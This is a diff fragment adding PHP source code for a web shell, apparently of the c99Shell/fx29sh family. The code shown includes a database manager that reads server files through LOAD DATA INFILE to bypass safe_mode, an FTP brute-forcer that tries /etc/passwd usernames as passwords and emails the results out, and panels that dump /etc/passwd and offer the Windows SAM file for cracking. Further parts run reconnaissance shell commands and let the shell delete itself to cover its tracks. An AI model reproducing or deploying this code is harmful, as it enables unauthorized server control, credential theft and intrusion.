+            echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+            $i++;
+          }
+          echo "</table><br>";
+          echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+          if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+          echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+        }
+      }
+      if ($sql_tbl_act == "browse") {
+        $sql_tbl_ls = abs($sql_tbl_ls);
+        $sql_tbl_le = abs($sql_tbl_le);
+        echo "<hr size=\"1\" noshade>";
+        echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+        $b = 0;
+        for($i=0;$i<$numpages;$i++) {
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+          echo $i;
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+          if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+          else {echo "&nbsp;";}
+        }
+        if ($i == 0) {echo "empty";}
+        echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+        echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
+        echo "<tr>";
+        echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+        for ($i=0;$i<mysql_num_fields($result);$i++) {
+          $v = mysql_field_name($result,$i);
+          if ($e[0] == "a") {$s = "d"; $m = "asc";}
+          else {$s = "a"; $m = "desc";}
+          echo "<td>";
+          if (empty($e[0])) {$e[0] = "a";}
+          if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+          else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+          echo "</td>";
+        }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>+</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act)) {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb") {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus") {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars") {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes") {
+     if (!empty($kill)) {
+       $query = "KILL ".$kill.";";
+       $result = mysql_query($query, $sql_sock);
+       echo "<b>Process #".$kill." was killed.</b>";
+     }
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+}
+echo "</td></tr></table>";
+if ($sql_sock) {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
+}
+echo "</table>";
+}
+//End of SQL Manager
+if ($act == "ftpquickbrute") {
+echo "<center><table><tr><td class=barheader colspan=2>";
+echo ".: Ftp Quick Brute :.</td></tr>";
+echo "<tr><td>";
+if ($win) {echo "Couldn't run on Windows!";}
+else {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
+    if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+    else {$TRUE = TRUE;}
+    if ($TRUE) {
+      $sock = @ftp_connect($host,$port,$timeout);
+      if (@ftp_login($sock,$login,$pass)) {
+        echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+        ob_flush();
+        return TRUE;
+      }
+    }
+  }
+  if (!empty($submit)) {
+    if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+    $fp = fopen("/etc/passwd","r");
+    if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+    else {
+      if ($fqb_logging) {
+        if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+        else {$fqb_logfp = FALSE;}
+        $fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+        if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      }
+      ob_flush();
+      $i = $success = 0;
+      $ftpquick_st = getmicrotime();
+      while(!feof($fp)) {
+        $str = explode(":",fgets($fp,2048));
+        if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
+          echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+          $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+          if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+          $success++;
+          ob_flush();
+        }
+        if ($i > $fqb_lenght) {break;}
+        $i++;
+      }
+      if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+      $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+      echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+      $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
+      fclose($fqb_logfp);
+    }
+  }
+  else {
+    $logfile = $tmpdir_logs."fx29sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+    $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+    echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\">".
+         "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
+         "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
+         "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
+         "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
+  }
+  echo "</td></tr></table></center>";
+}
+}
+if ($act == "d") {
+if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
+else {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win) {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
+}
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security") {
+  echo "<div class=barheader>.: Server Security Information :.</div>".
+       "<table>".
+       "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>";
+  echo "<td>Password File</td><td>";
+  if (!$win) {
+    if ($nixpasswd) {
+      if ($nixpasswd == 1) {$nixpasswd = 0;}
+      echo "*nix /etc/passwd:<br>";
+      if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+      if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+      echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+      $i = $nixpwd_s;
+      while ($i < $nixpwd_e) {
+        $uid = posix_getpwuid($i);
+        if ($uid) {
+          $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+          echo join(":",$uid)."<br>";
+        }
+        $i++;
+      }
+    }
+    else {echo "<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a>";}
+  }
+  else {
+    $v = $_SERVER["WINDIR"]."\repair\sam";
+    if (file_get_contents($v)) {echo "<td colspan=2><div class=fxerrmsg>You can't crack Windows passwords(".$v.")</div></td></tr>"; }
+    else {echo "You can crack Windows passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</td></tr>";}
+  }
+  echo "</td></tr>";
+  echo "<tr><td>Config Files</td><td>";
+  if (!$win) {
+    $v = array(
+        array("User Domains","/etc/userdomains"),
+        array("Cpanel Config","/var/cpanel/accounting.log"),
+        array("Apache Config","/usr/local/apache/conf/httpd.conf"),
+        array("Apache Config","/etc/httpd.conf"),
+        array("Syslog Config","/etc/syslog.conf"),
+        array("Message of The Day","/etc/motd"),
+        array("Hosts","/etc/hosts")
+    );
+    $sep = "/";
+  }
+  else {
+    $windir = $_SERVER["WINDIR"];
+    $etcdir = $windir . "\system32\drivers\etc\\";
+    $v = array(
+        array("Hosts",$etcdir."hosts"),
+        array("Local Network Map",$etcdir."networks"),
+        array("LM Hosts",$etcdir."lmhosts.sam"),
+    );
+    $sep = "\\";
+  }
+  foreach ($v as $sec_arr) {
+    $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
+    $sec_d = rtrim($sec_arr[1],$sec_f);
+    $sec_full = $sec_d.$sec_f;
+    $sec_d = rtrim($sec_d,$sep);
+    if (file_get_contents($sec_full)) {
+      echo " [ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><u><b>".$sec_arr[0]."</b></u></a> ] ";
+    }
+  }
+  echo "</td></tr>";
+
+  function displaysecinfo($name,$value) {
+    if (!empty($value)) {
+      echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>";
+    }
+  }
+  if (!$win) {
+    displaysecinfo("OS Version",myshellexec("cat /proc/version"));
+    displaysecinfo("Kernel Version",myshellexec("sysctl -a | grep version"));
+    displaysecinfo("Distrib Name",myshellexec("cat /etc/issue.net"));
+    displaysecinfo("Distrib Name (2)",myshellexec("cat /etc/*-realise"));
+    displaysecinfo("CPU Info",myshellexec("cat /proc/cpuinfo"));
+    displaysecinfo("RAM",myshellexec("free -m"));
+    displaysecinfo("HDD Space",myshellexec("df -h"));
+    displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+    displaysecinfo("Mount Options",myshellexec("cat /etc/fstab"));
+    displaysecinfo("cURL installed?",myshellexec("which curl"));
+    displaysecinfo("lynx installed?",myshellexec("which lynx"));
+    displaysecinfo("links installed?",myshellexec("which links"));
+    displaysecinfo("fetch installed?",myshellexec("which fetch"));
+    displaysecinfo("GET installed?",myshellexec("which GET"));
+    displaysecinfo("perl installed?",myshellexec("which perl"));
+    displaysecinfo("Where is Apache?",myshellexec("whereis apache"));
+    displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+    displaysecinfo("Locate proftpd.conf",myshellexec("locate proftpd.conf"));
+    displaysecinfo("Locate httpd.conf",myshellexec("locate httpd.conf"));
+    displaysecinfo("Locate my.conf",myshellexec("locate my.conf"));
+    displaysecinfo("Locate psybnc.conf",myshellexec("locate psybnc.conf"));
+  }
+  else {
+    displaysecinfo("OS Version",myshellexec("ver"));
+    displaysecinfo("Account Settings",myshellexec("net accounts"));
+  }
+  echo "</table>\n";
+}
+if ($act == "mkfile") {
+if ($mkfile != $d) {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object already exists!";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied!";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+}
+else {$act = $dspact = "ls";}
+}
+if ($act == "encoder") {
+echo "<script language=\"javascript\">function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>".
+     "<form name=\"encoder\" action=\"".$surl."\" method=POST>".
+     "<input type=hidden name=act value=encoder>".
+     "<center><table class=contents>".
+     "<tr><td colspan=4 class=barheader>.: Encoder :.</td>".
+     "<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br>".
+     "<input type=submit value=\"calculate\"></td></tr>".
+     "<tr><td rowspan=4>Hashes:</td>";
+foreach(array("md5","crypt","sha1","crc32") as $v) {
+  echo "<td>".$v.":</td><td><input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly></td></tr><tr>";
+}
+echo "</tr>".
+     "<tr><td rowspan=2>Url:</td>".
+     "<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly></td></tr>".
+     "<tr><td rowspan=2>Base64:</td>".
+     "<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>base64_decode:</td><td>";
+if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"Failed!\" disabled readonly>";}
+else {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>"; }
+  else { $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>"; }
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>";
+}
+echo "</td></tr>".
+     "<tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+$c = strlen($encoder_input);
+for($i=0;$i<$c;$i++) {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+}
+echo "\" readonly></td></tr></table></center></form>";
+}
+if ($act == "fsbuff") {
+  $arr_copy = $sess_data["copy"];
+  $arr_cut = $sess_data["cut"];
+  $arr = array_merge($arr_copy,$arr_cut);
+  if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
+  else {
+    $fx_infohead = "File-System Buffer";
+    $ls_arr = $arr;
+    $disp_fullpath = TRUE;
+    $act = "ls";
+  }
+}
+if ($act == "selfremove") {
+  if (($submit == $rndcode) and ($submit != "")) {
+    if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ".$sh_name."!"; c99shexit(); }
+    else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+  }
+  else {
+    if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";}
+    $rnd = rand(0,9).rand(0,9).rand(0,9);
+    echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+  }
+}
+if ($act == "update") { //Update c99Shell
+  $ret = c99sh_getupdate(!!$confirmupdate);
+  echo "<b>".$ret."</b>";
+  if (stristr($ret,"new version")) {
